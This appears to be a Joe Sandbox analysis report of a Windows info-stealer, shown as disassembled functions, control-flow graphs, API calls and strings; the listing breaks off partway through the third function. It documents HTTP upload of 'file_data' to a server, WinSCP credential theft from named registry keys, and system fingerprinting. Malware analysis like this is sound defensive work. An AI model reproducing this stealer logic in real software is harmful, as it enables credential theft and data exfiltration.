                                                                                        Function 004045D0 Relevance: 61.9, APIs: 26, Strings: 9, Instructions: 696networkstringmemoryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 729 4045d0-4046ae call 40f810 call 40f850 call 403d70 call 410df0 call 40fa50 lstrlenA call 40fa50 call 410df0 call 40f810 * 4 StrCmpCA 752 4046b0 729->752 753 4046b7-4046bc 729->753 752->753 754 4046dc-4047bd call 410b80 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f940 call 40f9a0 call 40f8f0 call 40f890 * 3 call 40f9a0 call 40f940 call 40f8f0 call 40f890 * 2 InternetConnectA 753->754 755 4046be-4046d6 call 40fa50 InternetOpenA 753->755 760 404ded-404e2c call 410ab0 * 2 call 40fa00 * 4 call 40f850 754->760 825 4047c3-4047f7 HttpOpenRequestA 754->825 755->754 755->760 788 404e31-404e81 call 40f890 * 9 760->788 826 404de6-404de7 InternetCloseHandle 825->826 827 4047fd-404800 825->827 826->760 828 404802-404812 InternetSetOptionA 827->828 829 404818-404d22 call 40f9a0 call 40f8f0 call 40f890 call 40f940 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f940 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f940 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 401ed0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f940 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f940 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fa50 lstrlenA call 40fa50 lstrlenA GetProcessHeap HeapAlloc call 40fa50 lstrlenA call 40fa50 memcpy call 40fa50 lstrlenA memcpy call 40fa50 lstrlenA call 40fa50 * 2 lstrlenA memcpy call 40fa50 lstrlenA call 40fa50 HttpSendRequestA call 410ab0 HttpQueryInfoA 827->829 828->829 1034 404d24-404d33 call 40f810 829->1034 1035 404d38-404d4c call 410a80 829->1035 1034->788 1035->1034 1040 404d4e-404d67 InternetReadFile 1035->1040 1041 404d69 1040->1041 1042 404dbd-404dd3 call 40fa50 StrCmpCA 1040->1042 1044 404d70-404d75 1041->1044 1047 404dd5-404dd6 ExitProcess 1042->1047 1048 404ddc-404de3 InternetCloseHandle 1042->1048 1044->1042 1046 404d77-404dbb call 40f9a0 call 40f8f0 call 40f890 InternetReadFile 1044->1046 1046->1042 1046->1044 1048->826
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
                                                                                          • Part of subcall function 00403D70: ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
                                                                                          • Part of subcall function 00403D70: lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
                                                                                          • Part of subcall function 00403D70: InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000030), ref: 00404641
                                                                                          • Part of subcall function 00410DF0: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00410E14
                                                                                          • Part of subcall function 00410DF0: GetProcessHeap.KERNEL32(00000000,?,?,00404635,?,?,?,?,?,?,?,?,00000030), ref: 00410E23
                                                                                          • Part of subcall function 00410DF0: HeapAlloc.KERNEL32(00000000,?,?,00404635,?,?,?,?,?,?,?,?,00000030), ref: 00410E2A
                                                                                        • StrCmpCA.SHLWAPI(?,0169A3B0,004201E9,004201E9,004201E9,004201E9), ref: 004046A6
                                                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004046CC
                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004047B0
                                                                                        • HttpOpenRequestA.WININET(00000000,0169A460,?,0169B128,00000000,00000000,?,00000000), ref: 004047ED
                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404812
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,0168FC00,00000000,?,00423358,00000000,?,?), ref: 00404C21
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00404C33
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404C45
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00404C4C
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00404C5E
                                                                                        • memcpy.MSVCRT ref: 00404C72
                                                                                        • lstrlenA.KERNEL32(00000000,?,?), ref: 00404C8B
                                                                                        • memcpy.MSVCRT ref: 00404C95
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00404CA6
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404CBF
                                                                                        • memcpy.MSVCRT ref: 00404CCC
                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000), ref: 00404CE2
                                                                                        • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404CF3
                                                                                        • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404D1A
                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404D5F
                                                                                        • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404DB3
                                                                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 00404DCB
                                                                                        • ExitProcess.KERNEL32 ref: 00404DD6
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00404DE7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$AllocFileOpenReadRequestlstrcat$BinaryCloseConnectCrackCryptExitHandleInfoOptionQuerySendString
                                                                                        • String ID: ------$"$--$------$=tA$ERROR$block$build_id$file_data
                                                                                        • API String ID: 1603122859-1039408876
                                                                                        • Opcode ID: 1c1ffefa2ff13fbe326aa9203372af6fb0db7731481744ecb8c0260a5eb49208
                                                                                        • Instruction ID: 5c63602dc81e6f21b2342bf72322e36899336e6e37317e40e758c60d5b7de2b6
                                                                                        • Opcode Fuzzy Hash: 1c1ffefa2ff13fbe326aa9203372af6fb0db7731481744ecb8c0260a5eb49208
                                                                                        • Instruction Fuzzy Hash: 5E42DB72D10109AADB14FBA1DC92DEE7778AF54304F50817EB212724D1EF386A4DCBA8
                                                                                        Function 0040E3C0 Relevance: 58.1, APIs: 19, Strings: 14, Instructions: 384registrystringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1055 40e3c0-40e446 memset * 4 RegOpenKeyExA 1056 40e448-40e46e RegGetValueA 1055->1056 1057 40e47e-40e4a4 call 40f890 * 4 1055->1057 1058 40e470-40e472 1056->1058 1059 40e4a5-40e4a8 1056->1059 1058->1057 1061 40e474-40e47b RegCloseKey 1058->1061 1059->1058 1063 40e4aa-40e4ac 1059->1063 1061->1057 1065 40e4b8-40e4cd RegOpenKeyExA 1063->1065 1066 40e4ae-40e4b5 RegCloseKey 1063->1066 1067 40e4d3-40e4ef RegEnumKeyExA 1065->1067 1068 40e859-40e867 call 401050 1065->1068 1066->1065 1070 40e4f1-40e4f6 1067->1070 1071 40e515-40e51d call 40f810 1067->1071 1070->1068 1074 40e4fc-40e514 RegCloseKey call 401050 1070->1074 1079 40e522-40e5d9 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 RegGetValueA call 40f9a0 call 40f8f0 call 40f890 RegGetValueA 1071->1079 1101 40e614-40e631 call 40f9a0 call 40f8f0 1079->1101 1102 40e5db-40e612 call 411240 call 40f940 call 40f8f0 call 40f890 1079->1102 1111 40e637-40e72c call 40f890 call 40f9a0 call 40f8f0 call 40f890 RegGetValueA call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 RegGetValueA call 40f9a0 call 40f8f0 call 40f890 StrCmpCA 1101->1111 1102->1111 1142 40e793-40e7e2 call 40f9a0 call 40f8f0 call 40f890 RegEnumKeyExA 1111->1142 1143 40e72e-40e75a call 40dd90 1111->1143 1142->1079 1157 40e7e8-40e845 call 40fa50 lstrlenA call 40fa50 call 40f810 call 401080 call 4142a0 call 40f890 1142->1157 1149 40e75c 1143->1149 1150 40e75e-40e782 call 40f9a0 call 40f8f0 call 40f890 1143->1150 1149->1150 1150->1142 1164 40e784-40e790 call 4114b0 1150->1164 1176 40e851-40e854 call 40f890 1157->1176 1177 40e847-40e84e RegCloseKey 1157->1177 1164->1142 1176->1068 1177->1176
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 0040E3E4
                                                                                        • memset.MSVCRT ref: 0040E3FE
                                                                                        • memset.MSVCRT ref: 0040E40C
                                                                                        • memset.MSVCRT ref: 0040E41A
                                                                                        • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,00416CFD,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040E442
                                                                                        • RegGetValueA.ADVAPI32(00416CFD,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0040E467
                                                                                        • RegCloseKey.ADVAPI32(00416CFD,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E475
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • RegCloseKey.ADVAPI32(00416CFD,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E4AF
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,00416CFD,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040E4C9
                                                                                        • RegEnumKeyExA.ADVAPI32(00416CFD,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0040E4E7
                                                                                        • RegCloseKey.ADVAPI32(00416CFD,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E4FD
                                                                                        • RegGetValueA.ADVAPI32(00416CFD,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,004201E9), ref: 0040E58A
                                                                                        • RegGetValueA.ADVAPI32(00416CFD,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0040E5D5
                                                                                        • RegGetValueA.ADVAPI32(00416CFD,?,UserName,00000002,00000000,?,?,00000000,?,Login: ,00000000,?,:22), ref: 0040E682
                                                                                        • RegGetValueA.ADVAPI32(00416CFD,?,Password,00000002,00000000,?,?,00000000,?,00423408,00000000,?,?), ref: 0040E6F4
                                                                                        • StrCmpCA.SHLWAPI(?,004201E9,00000000,?,Password: ,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040E724
                                                                                        • RegEnumKeyExA.ADVAPI32(00416CFD,?,?,00000104,00000000,00000000,00000000,00000000,00000000,?,00423684), ref: 0040E7D7
                                                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 0040E7F1
                                                                                        • RegCloseKey.ADVAPI32(00416CFD), ref: 0040E848
                                                                                          • Part of subcall function 0040DD90: GetProcessHeap.KERNEL32(00000008,?,75A8EC10,75AA5460,00000000), ref: 0040DDD8
                                                                                          • Part of subcall function 0040DD90: HeapAlloc.KERNEL32(00000000), ref: 0040DDDF
                                                                                          • Part of subcall function 0040DD90: GetProcessHeap.KERNEL32(00000000,?), ref: 0040DDF4
                                                                                          • Part of subcall function 0040DD90: HeapFree.KERNEL32(00000000), ref: 0040DDFB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000430000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000052A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000530000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000054F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.0000000000607000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2343717434.000000000063D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value$CloseHeapmemset$EnumOpenProcesslstrcpylstrlen$AllocFreelstrcat
                                                                                        • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                        • API String ID: 376919160-2798830873
                                                                                        • Opcode ID: 2a604499cc5fb1fbc1fa5b3e87ccd38f4035980184baed312169c8e40c75f4d7
                                                                                        • Instruction ID: ae86b70a3009f92c38161279bc2e3da00af9fe4ff8be4466f6dea0ea82a0e72c
                                                                                        • Opcode Fuzzy Hash: 2a604499cc5fb1fbc1fa5b3e87ccd38f4035980184baed312169c8e40c75f4d7
                                                                                        • Instruction Fuzzy Hash: 7BD11DB2910119AEDB24EBA1DC91EEEB37CAF54304F50457EF105B2591EB386B48CB68
                                                                                        Function 004144B0 Relevance: 48.1, APIs: 2, Strings: 25, Instructions: 834stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 1370 4144b0-414f76 call 40f810 call 40f9a0 call 40f8f0 call 40f890 call 401ec0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fb60 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 410340 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 4103e0 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 410420 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 GetCurrentProcessId call 411090 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 4105a0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 410730 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 410900 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fb20 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fae0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 4102c0 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fc30 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fb60 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fbc0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fd30 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fde0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fda0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40fed0 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40ff40 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 410200 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40f9a0 call 40f8f0 call 40f890 call 40ffc0 call 40f940 call 40f8f0 call 40f890 * 2 call 40ffc0 call 40f940 call 40f8f0 call 40f890 * 2 call 40f9a0 call 40f8f0 call 40f890 call 40fa50 lstrlenA call 40fa50 call 40f810 call 401080 call 4142a0 call 40f890 * 6
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                          • Part of subcall function 0040FB60: GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,?,Version: ,004201E9,?,?,?,?,?,?,?,00416C7F,?), ref: 0040FB6E
                                                                                          • Part of subcall function 0040FB60: HeapAlloc.KERNEL32(00000000,?,00000000,?,Version: ,004201E9,?,?,?,?,?,?,?,00416C7F,?), ref: 0040FB75
                                                                                          • Part of subcall function 0040FB60: GetLocalTime.KERNEL32(00000000,?,00000000,?,Version: ,004201E9,?,?,?,?,?,?,?,00416C7F,?), ref: 0040FB81
                                                                                          • Part of subcall function 0040FB60: wsprintfA.USER32 ref: 0040FBAD
                                                                                          • Part of subcall function 00410340: memset.MSVCRT ref: 00410365
                                                                                          • Part of subcall function 00410340: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004201E9), ref: 00410382
                                                                                          • Part of subcall function 00410340: RegQueryValueExA.KERNEL32(004201E9,MachineGuid,00000000,00000000,00000000,000000FF), ref: 004103A4
                                                                                          • Part of subcall function 00410340: RegCloseKey.ADVAPI32(004201E9), ref: 004103AE
                                                                                          • Part of subcall function 00410340: CharToOemA.USER32(00000000,?), ref: 004103C2
                                                                                          • Part of subcall function 004103E0: GetCurrentHwProfileA.ADVAPI32(00000000), ref: 004103EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 00410420: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0041043C
                                                                                          • Part of subcall function 00410420: GetVolumeInformationA.KERNEL32({kA,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00410475
                                                                                          • Part of subcall function 00410420: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004104BF
                                                                                          • Part of subcall function 00410420: HeapAlloc.KERNEL32(00000000), ref: 004104C6
                                                                                        • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00423684,00000000,?,00000000,00000000,004201E9), ref: 00414728
                                                                                          • Part of subcall function 00411090: OpenProcess.KERNEL32(00000410,00000000,?), ref: 004110A5
                                                                                          • Part of subcall function 00411090: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 004110C0
                                                                                          • Part of subcall function 00411090: CloseHandle.KERNEL32(00000000), ref: 004110C7
                                                                                          • Part of subcall function 004105A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004105B5
                                                                                          • Part of subcall function 004105A0: HeapAlloc.KERNEL32(00000000), ref: 004105BC
                                                                                          • Part of subcall function 00410730: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?,Work Dir: In memory,00000000), ref: 00410758
                                                                                          • Part of subcall function 00410730: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000), ref: 00410769
                                                                                          • Part of subcall function 00410730: CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?,00423684,00000000,?), ref: 00410783
                                                                                          • Part of subcall function 00410730: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,00000000,00000000,?,Windows: ,00000000,?), ref: 004107BC
                                                                                          • Part of subcall function 00410730: VariantInit.OLEAUT32(?), ref: 0041081B
                                                                                          • Part of subcall function 00410900: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 00410928
                                                                                          • Part of subcall function 00410900: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000), ref: 00410939
                                                                                          • Part of subcall function 00410900: CoCreateInstance.OLE32(004249C0,00000000,00000001,004248F0,00000000,?,00000030,?,00000000,?,AV: ,00000000,?,00423408,00000000,?), ref: 00410953
                                                                                          • Part of subcall function 00410900: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000030,?,00000000,?,AV: ,00000000,?), ref: 0041098C
                                                                                          • Part of subcall function 00410900: VariantInit.OLEAUT32(?), ref: 004109E3
                                                                                          • Part of subcall function 0040FB20: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00414941,00000000,?,Computer Name: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 0040FB2C
                                                                                          • Part of subcall function 0040FB20: HeapAlloc.KERNEL32(00000000,?,?,?,00414941,00000000,?,Computer Name: ,00000000,?,00423408,00000000,?,00000000,00000000,00000000), ref: 0040FB33
                                                                                          • Part of subcall function 0040FB20: GetComputerNameA.KERNEL32(00000000,00000000), ref: 0040FB47
                                                                                          • Part of subcall function 0040FAE0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417612,004201E9), ref: 0040FAEC
                                                                                          • Part of subcall function 0040FAE0: HeapAlloc.KERNEL32(00000000,?,?,?,00417612,004201E9), ref: 0040FAF3
                                                                                          • Part of subcall function 0040FAE0: GetUserNameA.ADVAPI32(00000000,004201E9), ref: 0040FB07
                                                                                          • Part of subcall function 004102C0: CreateDCA.GDI32(0168EE88,00000000,00000000,00000000), ref: 004102D2
                                                                                          • Part of subcall function 004102C0: GetDeviceCaps.GDI32(00000000,00000008), ref: 004102DD
                                                                                          • Part of subcall function 004102C0: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004102E8
                                                                                          • Part of subcall function 004102C0: ReleaseDC.USER32(00000000,00000000), ref: 004102F3
                                                                                          • Part of subcall function 004102C0: GetProcessHeap.KERNEL32(00000000,00000104,?,00000030,?,00414A13,?,00000000,?,Display Resolution: ,00000000,?,00423408,00000000,?,00000000), ref: 00410300
                                                                                          • Part of subcall function 004102C0: HeapAlloc.KERNEL32(00000000,?,00000030,?,00414A13,?,00000000,?,Display Resolution: ,00000000,?,00423408,00000000,?,00000000,00000000), ref: 00410307
                                                                                          • Part of subcall function 004102C0: wsprintfA.USER32 ref: 00410317
                                                                                          • Part of subcall function 0040FC30: GetKeyboardLayoutList.USER32(00000000,00000000,004201E9,00000000,?,00000030), ref: 0040FC4D
                                                                                          • Part of subcall function 0040FC30: LocalAlloc.KERNEL32(00000040,00000000,?,00000030), ref: 0040FC5F
                                                                                          • Part of subcall function 0040FC30: GetKeyboardLayoutList.USER32(00000000,00000000,?,00000030), ref: 0040FC69
                                                                                          • Part of subcall function 0040FC30: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,?,00000030), ref: 0040FC93
                                                                                          • Part of subcall function 0040FC30: LocalFree.KERNEL32(00000000,?,00000030), ref: 0040FD16
                                                                                          • Part of subcall function 0040FBC0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FBD1
                                                                                          • Part of subcall function 0040FBC0: HeapAlloc.KERNEL32(00000000), ref: 0040FBD8
                                                                                          • Part of subcall function 0040FBC0: GetTimeZoneInformation.KERNEL32(?), ref: 0040FBE7
                                                                                          • Part of subcall function 0040FBC0: wsprintfA.USER32 ref: 0040FC12
                                                                                          • Part of subcall function 0040FD30: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FD45
